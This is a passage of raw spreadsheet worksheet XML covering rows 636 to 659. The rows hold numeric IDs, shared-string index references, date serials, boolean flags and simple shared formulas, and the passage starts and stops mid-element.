      </c>
      <c r="K636" s="2" t="s">
        <v>2903</v>
      </c>
      <c r="L636" s="1">
        <v>18.0</v>
      </c>
      <c r="M636" s="1">
        <v>29.0</v>
      </c>
      <c r="N636" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O636" s="1" t="s">
        <v>2904</v>
      </c>
      <c r="P636" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q636" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R636" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S636" s="1">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
    </row>
    <row r="637">
      <c r="A637" s="1">
        <v>8953.0</v>
      </c>
      <c r="B637" s="2" t="s">
        <v>2905</v>
      </c>
      <c r="C637" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D637" s="2" t="s">
        <v>2906</v>
      </c>
      <c r="E637" s="2" t="s">
        <v>51</v>
      </c>
      <c r="F637" s="1" t="s">
        <v>2255</v>
      </c>
      <c r="G637" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H637" s="1" t="s">
        <v>2907</v>
      </c>
      <c r="I637" s="1" t="s">
        <v>184</v>
      </c>
      <c r="J637" s="1" t="s">
        <v>2902</v>
      </c>
      <c r="K637" s="2" t="s">
        <v>2903</v>
      </c>
      <c r="L637" s="1">
        <v>18.0</v>
      </c>
      <c r="M637" s="1">
        <v>29.0</v>
      </c>
      <c r="N637" s="1" t="s">
        <v>2908</v>
      </c>
      <c r="O637" s="1" t="s">
        <v>2904</v>
      </c>
      <c r="P637" s="1" t="s">
        <v>30</v>
      </c>
      <c r="Q637" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R637" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S637" s="1">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
    </row>
    <row r="638">
      <c r="A638" s="1">
        <v>8954.0</v>
      </c>
      <c r="B638" s="2" t="s">
        <v>2909</v>
      </c>
      <c r="C638" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D638" s="2" t="s">
        <v>2901</v>
      </c>
      <c r="E638" s="2" t="s">
        <v>51</v>
      </c>
      <c r="F638" s="1" t="s">
        <v>1389</v>
      </c>
      <c r="G638" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H638" s="1" t="s">
        <v>2910</v>
      </c>
      <c r="I638" s="1" t="s">
        <v>184</v>
      </c>
      <c r="J638" s="1" t="s">
        <v>2902</v>
      </c>
      <c r="K638" s="2" t="s">
        <v>2903</v>
      </c>
      <c r="L638" s="1">
        <v>18.0</v>
      </c>
      <c r="M638" s="1">
        <v>29.0</v>
      </c>
      <c r="N638" s="1" t="s">
        <v>2911</v>
      </c>
      <c r="O638" s="1" t="s">
        <v>2904</v>
      </c>
      <c r="P638" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q638" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R638" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S638" s="1">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
    </row>
    <row r="639">
      <c r="A639" s="1">
        <v>8959.0</v>
      </c>
      <c r="B639" s="2" t="s">
        <v>2912</v>
      </c>
      <c r="C639" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D639" s="2" t="s">
        <v>2913</v>
      </c>
      <c r="E639" s="2" t="s">
        <v>81</v>
      </c>
      <c r="F639" s="1" t="s">
        <v>747</v>
      </c>
      <c r="G639" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H639" s="1" t="s">
        <v>2914</v>
      </c>
      <c r="I639" s="1" t="s">
        <v>748</v>
      </c>
      <c r="J639" s="1" t="s">
        <v>2915</v>
      </c>
      <c r="K639" s="2" t="s">
        <v>2916</v>
      </c>
      <c r="L639" s="1">
        <v>1.0</v>
      </c>
      <c r="M639" s="1">
        <v>1.0</v>
      </c>
      <c r="N639" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O639" s="1" t="s">
        <v>132</v>
      </c>
      <c r="P639" s="1" t="s">
        <v>2917</v>
      </c>
      <c r="Q639" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R639" s="2">
        <f t="shared" si="2"/>
        <v>11</v>
      </c>
      <c r="S639" s="1">
        <f t="shared" si="3"/>
        <v>11</v>
      </c>
    </row>
    <row r="640">
      <c r="A640" s="1">
        <v>8960.0</v>
      </c>
      <c r="B640" s="2" t="s">
        <v>2918</v>
      </c>
      <c r="C640" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D640" s="2" t="s">
        <v>2913</v>
      </c>
      <c r="E640" s="2" t="s">
        <v>111</v>
      </c>
      <c r="F640" s="1" t="s">
        <v>747</v>
      </c>
      <c r="G640" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H640" s="1" t="s">
        <v>2919</v>
      </c>
      <c r="I640" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J640" s="1" t="s">
        <v>2920</v>
      </c>
      <c r="K640" s="2" t="s">
        <v>2916</v>
      </c>
      <c r="L640" s="1">
        <v>1.0</v>
      </c>
      <c r="M640" s="1">
        <v>1.0</v>
      </c>
      <c r="N640" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O640" s="1" t="s">
        <v>132</v>
      </c>
      <c r="P640" s="1" t="s">
        <v>30</v>
      </c>
      <c r="Q640" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R640" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S640" s="1">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
    </row>
    <row r="641">
      <c r="A641" s="1">
        <v>9213.0</v>
      </c>
      <c r="B641" s="2" t="s">
        <v>2921</v>
      </c>
      <c r="C641" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D641" s="2" t="s">
        <v>2689</v>
      </c>
      <c r="E641" s="2" t="s">
        <v>22</v>
      </c>
      <c r="F641" s="1" t="s">
        <v>271</v>
      </c>
      <c r="G641" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H641" s="1" t="s">
        <v>2922</v>
      </c>
      <c r="I641" s="1" t="s">
        <v>361</v>
      </c>
      <c r="J641" s="1" t="s">
        <v>2923</v>
      </c>
      <c r="K641" s="2" t="s">
        <v>2924</v>
      </c>
      <c r="L641" s="1">
        <v>4.0</v>
      </c>
      <c r="M641" s="1">
        <v>4.0</v>
      </c>
      <c r="N641" s="1" t="s">
        <v>2925</v>
      </c>
      <c r="O641" s="1" t="s">
        <v>2926</v>
      </c>
      <c r="P641" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q641" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R641" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S641" s="1">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
    </row>
    <row r="642">
      <c r="A642" s="1">
        <v>9215.0</v>
      </c>
      <c r="B642" s="2" t="s">
        <v>2927</v>
      </c>
      <c r="C642" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D642" s="2" t="s">
        <v>2928</v>
      </c>
      <c r="E642" s="2" t="s">
        <v>1640</v>
      </c>
      <c r="F642" s="1" t="s">
        <v>2929</v>
      </c>
      <c r="G642" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H642" s="1" t="s">
        <v>2930</v>
      </c>
      <c r="I642" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J642" s="1" t="s">
        <v>2931</v>
      </c>
      <c r="K642" s="2" t="s">
        <v>2932</v>
      </c>
      <c r="L642" s="1">
        <v>3.0</v>
      </c>
      <c r="M642" s="1">
        <v>7.0</v>
      </c>
      <c r="N642" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O642" s="1" t="s">
        <v>2933</v>
      </c>
      <c r="P642" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q642" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R642" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S642" s="1">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
    </row>
    <row r="643">
      <c r="A643" s="1">
        <v>9216.0</v>
      </c>
      <c r="B643" s="2" t="s">
        <v>2934</v>
      </c>
      <c r="C643" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D643" s="2" t="s">
        <v>2928</v>
      </c>
      <c r="E643" s="2" t="s">
        <v>51</v>
      </c>
      <c r="F643" s="1" t="s">
        <v>1402</v>
      </c>
      <c r="G643" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H643" s="1" t="s">
        <v>2935</v>
      </c>
      <c r="I643" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J643" s="1" t="s">
        <v>2931</v>
      </c>
      <c r="K643" s="2" t="s">
        <v>2932</v>
      </c>
      <c r="L643" s="1">
        <v>3.0</v>
      </c>
      <c r="M643" s="1">
        <v>7.0</v>
      </c>
      <c r="N643" s="1" t="s">
        <v>2936</v>
      </c>
      <c r="O643" s="1" t="s">
        <v>2933</v>
      </c>
      <c r="P643" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q643" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R643" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S643" s="1">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
    </row>
    <row r="644">
      <c r="A644" s="1">
        <v>9217.0</v>
      </c>
      <c r="B644" s="2" t="s">
        <v>2937</v>
      </c>
      <c r="C644" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D644" s="2" t="s">
        <v>2928</v>
      </c>
      <c r="E644" s="2" t="s">
        <v>51</v>
      </c>
      <c r="F644" s="1" t="s">
        <v>2929</v>
      </c>
      <c r="G644" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H644" s="1" t="s">
        <v>2938</v>
      </c>
      <c r="I644" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J644" s="1" t="s">
        <v>2931</v>
      </c>
      <c r="K644" s="2" t="s">
        <v>2932</v>
      </c>
      <c r="L644" s="1">
        <v>3.0</v>
      </c>
      <c r="M644" s="1">
        <v>7.0</v>
      </c>
      <c r="N644" s="1" t="s">
        <v>2939</v>
      </c>
      <c r="O644" s="1" t="s">
        <v>2933</v>
      </c>
      <c r="P644" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q644" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R644" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S644" s="1">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
    </row>
    <row r="645">
      <c r="A645" s="1">
        <v>9220.0</v>
      </c>
      <c r="B645" s="2" t="s">
        <v>2940</v>
      </c>
      <c r="C645" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D645" s="2" t="s">
        <v>2928</v>
      </c>
      <c r="E645" s="2" t="s">
        <v>51</v>
      </c>
      <c r="F645" s="1" t="s">
        <v>2941</v>
      </c>
      <c r="G645" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H645" s="1" t="s">
        <v>2942</v>
      </c>
      <c r="I645" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J645" s="1" t="s">
        <v>2931</v>
      </c>
      <c r="K645" s="2" t="s">
        <v>2932</v>
      </c>
      <c r="L645" s="1">
        <v>3.0</v>
      </c>
      <c r="M645" s="1">
        <v>7.0</v>
      </c>
      <c r="N645" s="1" t="s">
        <v>2943</v>
      </c>
      <c r="O645" s="1" t="s">
        <v>2933</v>
      </c>
      <c r="P645" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q645" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R645" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S645" s="1">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
    </row>
    <row r="646">
      <c r="A646" s="1">
        <v>9221.0</v>
      </c>
      <c r="B646" s="2" t="s">
        <v>2944</v>
      </c>
      <c r="C646" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D646" s="2" t="s">
        <v>2928</v>
      </c>
      <c r="E646" s="2" t="s">
        <v>51</v>
      </c>
      <c r="F646" s="1" t="s">
        <v>2929</v>
      </c>
      <c r="G646" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H646" s="1" t="s">
        <v>2945</v>
      </c>
      <c r="I646" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J646" s="1" t="s">
        <v>2931</v>
      </c>
      <c r="K646" s="2" t="s">
        <v>2932</v>
      </c>
      <c r="L646" s="1">
        <v>3.0</v>
      </c>
      <c r="M646" s="1">
        <v>7.0</v>
      </c>
      <c r="N646" s="1" t="s">
        <v>2946</v>
      </c>
      <c r="O646" s="1" t="s">
        <v>2933</v>
      </c>
      <c r="P646" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q646" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R646" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S646" s="1">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
    </row>
    <row r="647">
      <c r="A647" s="1">
        <v>9234.0</v>
      </c>
      <c r="B647" s="2" t="s">
        <v>2947</v>
      </c>
      <c r="C647" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D647" s="2" t="s">
        <v>2948</v>
      </c>
      <c r="E647" s="2" t="s">
        <v>242</v>
      </c>
      <c r="F647" s="1" t="s">
        <v>551</v>
      </c>
      <c r="G647" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H647" s="4">
        <v>44383.04305555556</v>
      </c>
      <c r="I647" s="1" t="s">
        <v>1582</v>
      </c>
      <c r="J647" s="1" t="s">
        <v>2949</v>
      </c>
      <c r="K647" s="2" t="s">
        <v>2950</v>
      </c>
      <c r="L647" s="1">
        <v>5.0</v>
      </c>
      <c r="M647" s="1">
        <v>7.0</v>
      </c>
      <c r="N647" s="1" t="s">
        <v>214</v>
      </c>
      <c r="O647" s="1" t="s">
        <v>2951</v>
      </c>
      <c r="P647" s="1" t="s">
        <v>30</v>
      </c>
      <c r="Q647" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R647" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S647" s="1">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
    </row>
    <row r="648">
      <c r="A648" s="1">
        <v>9302.0</v>
      </c>
      <c r="B648" s="2" t="s">
        <v>2952</v>
      </c>
      <c r="C648" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D648" s="2" t="s">
        <v>2953</v>
      </c>
      <c r="E648" s="2" t="s">
        <v>242</v>
      </c>
      <c r="F648" s="1" t="s">
        <v>2954</v>
      </c>
      <c r="G648" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H648" s="4">
        <v>44448.864583333336</v>
      </c>
      <c r="I648" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J648" s="1" t="s">
        <v>2955</v>
      </c>
      <c r="K648" s="2" t="s">
        <v>2956</v>
      </c>
      <c r="L648" s="1">
        <v>5.0</v>
      </c>
      <c r="M648" s="1">
        <v>5.0</v>
      </c>
      <c r="N648" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O648" s="1" t="s">
        <v>2957</v>
      </c>
      <c r="P648" s="1" t="s">
        <v>1416</v>
      </c>
      <c r="Q648" s="1">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="R648" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S648" s="1">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
    </row>
    <row r="649">
      <c r="A649" s="1">
        <v>9304.0</v>
      </c>
      <c r="B649" s="2" t="s">
        <v>2958</v>
      </c>
      <c r="C649" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D649" s="2" t="s">
        <v>2953</v>
      </c>
      <c r="E649" s="2" t="s">
        <v>22</v>
      </c>
      <c r="F649" s="1" t="s">
        <v>879</v>
      </c>
      <c r="G649" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H649" s="4">
        <v>44448.91388888889</v>
      </c>
      <c r="I649" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J649" s="1" t="s">
        <v>2955</v>
      </c>
      <c r="K649" s="2" t="s">
        <v>2956</v>
      </c>
      <c r="L649" s="1">
        <v>5.0</v>
      </c>
      <c r="M649" s="1">
        <v>5.0</v>
      </c>
      <c r="N649" s="1" t="s">
        <v>2959</v>
      </c>
      <c r="O649" s="1" t="s">
        <v>2957</v>
      </c>
      <c r="P649" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q649" s="1">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="R649" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S649" s="1">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
    </row>
    <row r="650">
      <c r="A650" s="1">
        <v>9314.0</v>
      </c>
      <c r="B650" s="2" t="s">
        <v>2960</v>
      </c>
      <c r="C650" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D650" s="2" t="s">
        <v>2961</v>
      </c>
      <c r="E650" s="2" t="s">
        <v>242</v>
      </c>
      <c r="F650" s="1" t="s">
        <v>785</v>
      </c>
      <c r="G650" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H650" s="4">
        <v>44655.88611111111</v>
      </c>
      <c r="I650" s="1" t="s">
        <v>220</v>
      </c>
      <c r="J650" s="1" t="s">
        <v>2962</v>
      </c>
      <c r="K650" s="2" t="s">
        <v>2963</v>
      </c>
      <c r="L650" s="1">
        <v>4.0</v>
      </c>
      <c r="M650" s="1">
        <v>6.0</v>
      </c>
      <c r="N650" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O650" s="1" t="s">
        <v>2964</v>
      </c>
      <c r="P650" s="1" t="s">
        <v>30</v>
      </c>
      <c r="Q650" s="1">
        <f t="shared" si="1"/>
        <v>2</v>
      </c>
      <c r="R650" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S650" s="1">
        <f t="shared" si="3"/>
        <v>2</v>
      </c>
    </row>
    <row r="651">
      <c r="A651" s="1">
        <v>9315.0</v>
      </c>
      <c r="B651" s="2" t="s">
        <v>2965</v>
      </c>
      <c r="C651" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D651" s="2" t="s">
        <v>2961</v>
      </c>
      <c r="E651" s="2" t="s">
        <v>22</v>
      </c>
      <c r="F651" s="1" t="s">
        <v>232</v>
      </c>
      <c r="G651" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H651" s="4">
        <v>44655.94236111111</v>
      </c>
      <c r="I651" s="1" t="s">
        <v>220</v>
      </c>
      <c r="J651" s="1" t="s">
        <v>2962</v>
      </c>
      <c r="K651" s="2" t="s">
        <v>2963</v>
      </c>
      <c r="L651" s="1">
        <v>4.0</v>
      </c>
      <c r="M651" s="1">
        <v>6.0</v>
      </c>
      <c r="N651" s="1" t="s">
        <v>375</v>
      </c>
      <c r="O651" s="1" t="s">
        <v>2964</v>
      </c>
      <c r="P651" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q651" s="1">
        <f t="shared" si="1"/>
        <v>2</v>
      </c>
      <c r="R651" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S651" s="1">
        <f t="shared" si="3"/>
        <v>2</v>
      </c>
    </row>
    <row r="652">
      <c r="A652" s="1">
        <v>9316.0</v>
      </c>
      <c r="B652" s="2" t="s">
        <v>2966</v>
      </c>
      <c r="C652" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D652" s="2" t="s">
        <v>2961</v>
      </c>
      <c r="E652" s="2" t="s">
        <v>51</v>
      </c>
      <c r="F652" s="1" t="s">
        <v>785</v>
      </c>
      <c r="G652" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H652" s="4">
        <v>44655.95763888889</v>
      </c>
      <c r="I652" s="1" t="s">
        <v>220</v>
      </c>
      <c r="J652" s="1" t="s">
        <v>2962</v>
      </c>
      <c r="K652" s="2" t="s">
        <v>2963</v>
      </c>
      <c r="L652" s="1">
        <v>4.0</v>
      </c>
      <c r="M652" s="1">
        <v>6.0</v>
      </c>
      <c r="N652" s="1" t="s">
        <v>1553</v>
      </c>
      <c r="O652" s="1" t="s">
        <v>2964</v>
      </c>
      <c r="P652" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q652" s="1">
        <f t="shared" si="1"/>
        <v>2</v>
      </c>
      <c r="R652" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S652" s="1">
        <f t="shared" si="3"/>
        <v>2</v>
      </c>
    </row>
    <row r="653">
      <c r="A653" s="1">
        <v>9318.0</v>
      </c>
      <c r="B653" s="2" t="s">
        <v>2967</v>
      </c>
      <c r="C653" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D653" s="2" t="s">
        <v>2961</v>
      </c>
      <c r="E653" s="2" t="s">
        <v>111</v>
      </c>
      <c r="F653" s="1" t="s">
        <v>785</v>
      </c>
      <c r="G653" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H653" s="4">
        <v>44685.211805555555</v>
      </c>
      <c r="I653" s="1" t="s">
        <v>220</v>
      </c>
      <c r="J653" s="1" t="s">
        <v>2962</v>
      </c>
      <c r="K653" s="2" t="s">
        <v>2963</v>
      </c>
      <c r="L653" s="1">
        <v>4.0</v>
      </c>
      <c r="M653" s="1">
        <v>6.0</v>
      </c>
      <c r="N653" s="1" t="s">
        <v>2968</v>
      </c>
      <c r="O653" s="1" t="s">
        <v>2964</v>
      </c>
      <c r="P653" s="1" t="s">
        <v>30</v>
      </c>
      <c r="Q653" s="1">
        <f t="shared" si="1"/>
        <v>2</v>
      </c>
      <c r="R653" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S653" s="1">
        <f t="shared" si="3"/>
        <v>2</v>
      </c>
    </row>
    <row r="654">
      <c r="A654" s="1">
        <v>9390.0</v>
      </c>
      <c r="B654" s="2" t="s">
        <v>2969</v>
      </c>
      <c r="C654" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D654" s="2" t="s">
        <v>2970</v>
      </c>
      <c r="E654" s="2" t="s">
        <v>81</v>
      </c>
      <c r="F654" s="1" t="s">
        <v>859</v>
      </c>
      <c r="G654" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H654" s="1" t="s">
        <v>2971</v>
      </c>
      <c r="I654" s="1" t="s">
        <v>742</v>
      </c>
      <c r="J654" s="1" t="s">
        <v>2972</v>
      </c>
      <c r="K654" s="2" t="s">
        <v>2973</v>
      </c>
      <c r="L654" s="1">
        <v>1.0</v>
      </c>
      <c r="M654" s="1">
        <v>1.0</v>
      </c>
      <c r="N654" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O654" s="1" t="s">
        <v>132</v>
      </c>
      <c r="P654" s="1" t="s">
        <v>1416</v>
      </c>
      <c r="Q654" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R654" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S654" s="1">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
    </row>
    <row r="655">
      <c r="A655" s="1">
        <v>9397.0</v>
      </c>
      <c r="B655" s="2" t="s">
        <v>2974</v>
      </c>
      <c r="C655" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D655" s="2" t="s">
        <v>2975</v>
      </c>
      <c r="E655" s="2" t="s">
        <v>242</v>
      </c>
      <c r="F655" s="1" t="s">
        <v>2976</v>
      </c>
      <c r="G655" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H655" s="1" t="s">
        <v>2977</v>
      </c>
      <c r="I655" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J655" s="1" t="s">
        <v>2978</v>
      </c>
      <c r="K655" s="2" t="s">
        <v>2979</v>
      </c>
      <c r="L655" s="1">
        <v>3.0</v>
      </c>
      <c r="M655" s="1">
        <v>4.0</v>
      </c>
      <c r="N655" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O655" s="1" t="s">
        <v>2980</v>
      </c>
      <c r="P655" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q655" s="1">
        <f t="shared" si="1"/>
        <v>2</v>
      </c>
      <c r="R655" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S655" s="1">
        <f t="shared" si="3"/>
        <v>2</v>
      </c>
    </row>
    <row r="656">
      <c r="A656" s="1">
        <v>9398.0</v>
      </c>
      <c r="B656" s="2" t="s">
        <v>2981</v>
      </c>
      <c r="C656" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D656" s="2" t="s">
        <v>2975</v>
      </c>
      <c r="E656" s="2" t="s">
        <v>22</v>
      </c>
      <c r="F656" s="1" t="s">
        <v>2982</v>
      </c>
      <c r="G656" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H656" s="1" t="s">
        <v>2983</v>
      </c>
      <c r="I656" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J656" s="1" t="s">
        <v>2978</v>
      </c>
      <c r="K656" s="2" t="s">
        <v>2979</v>
      </c>
      <c r="L656" s="1">
        <v>3.0</v>
      </c>
      <c r="M656" s="1">
        <v>4.0</v>
      </c>
      <c r="N656" s="1" t="s">
        <v>2984</v>
      </c>
      <c r="O656" s="1" t="s">
        <v>2980</v>
      </c>
      <c r="P656" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q656" s="1">
        <f t="shared" si="1"/>
        <v>2</v>
      </c>
      <c r="R656" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S656" s="1">
        <f t="shared" si="3"/>
        <v>2</v>
      </c>
    </row>
    <row r="657">
      <c r="A657" s="1">
        <v>9400.0</v>
      </c>
      <c r="B657" s="2" t="s">
        <v>2985</v>
      </c>
      <c r="C657" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D657" s="2" t="s">
        <v>2975</v>
      </c>
      <c r="E657" s="2" t="s">
        <v>22</v>
      </c>
      <c r="F657" s="1" t="s">
        <v>2986</v>
      </c>
      <c r="G657" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H657" s="1" t="s">
        <v>2987</v>
      </c>
      <c r="I657" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J657" s="1" t="s">
        <v>2978</v>
      </c>
      <c r="K657" s="2" t="s">
        <v>2979</v>
      </c>
      <c r="L657" s="1">
        <v>3.0</v>
      </c>
      <c r="M657" s="1">
        <v>4.0</v>
      </c>
      <c r="N657" s="1" t="s">
        <v>1468</v>
      </c>
      <c r="O657" s="1" t="s">
        <v>2980</v>
      </c>
      <c r="P657" s="1" t="s">
        <v>30</v>
      </c>
      <c r="Q657" s="1">
        <f t="shared" si="1"/>
        <v>2</v>
      </c>
      <c r="R657" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S657" s="1">
        <f t="shared" si="3"/>
        <v>2</v>
      </c>
    </row>
    <row r="658">
      <c r="A658" s="1">
        <v>9529.0</v>
      </c>
      <c r="B658" s="2" t="s">
        <v>2988</v>
      </c>
      <c r="C658" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D658" s="2" t="s">
        <v>2989</v>
      </c>
      <c r="E658" s="2" t="s">
        <v>135</v>
      </c>
      <c r="F658" s="1" t="s">
        <v>2990</v>
      </c>
      <c r="G658" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H658" s="1" t="s">
        <v>2991</v>
      </c>
      <c r="I658" s="1" t="s">
        <v>814</v>
      </c>
      <c r="J658" s="1" t="s">
        <v>2992</v>
      </c>
      <c r="K658" s="2" t="s">
        <v>2993</v>
      </c>
      <c r="L658" s="1">
        <v>3.0</v>
      </c>
      <c r="M658" s="1">
        <v>3.0</v>
      </c>
      <c r="N658" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O658" s="1" t="s">
        <v>2994</v>
      </c>
      <c r="P658" s="1" t="s">
        <v>30</v>
      </c>
      <c r="Q658" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R658" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S658" s="1">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
    </row>
    <row r="659">
      <c r="A659" s="1">
        <v>9594.0</v>
      </c>
      <c r="B659" s="2" t="s">
        <v>2995</v>
      </c>
      <c r="C659" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D659" s="2" t="s">
        <v>2996</v>
      </c>
      <c r="E659" s="2" t="s">
        <v>242</v>
      </c>
      <c r="F659" s="1" t="s">
        <v>1027</v>
      </c>
      <c r="G659" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H659" s="1" t="s">
        <v>2997</v>
      </c>
      <c r="I659" s="1" t="s">
        <v>92</v>
      </c>
      <c r="J659" s="1" t="s">
        <v>2998</v>
      </c>
      <c r="K659" s="2" t="s">
        <v>2999</v>
      </c>
      <c r="L659" s="1">
        <v>4.0</v>
      </c>
      <c r="M659" s="1">
        <v>5.0</v>
      </c>
      <c r="N659" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O659" s="1" t="s">
        <v>3000</v>
      </c>
      <c r="P659" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q659" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R659" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S659" s="1">
        <f t="shared" si="3"/>
        <v>1</v>
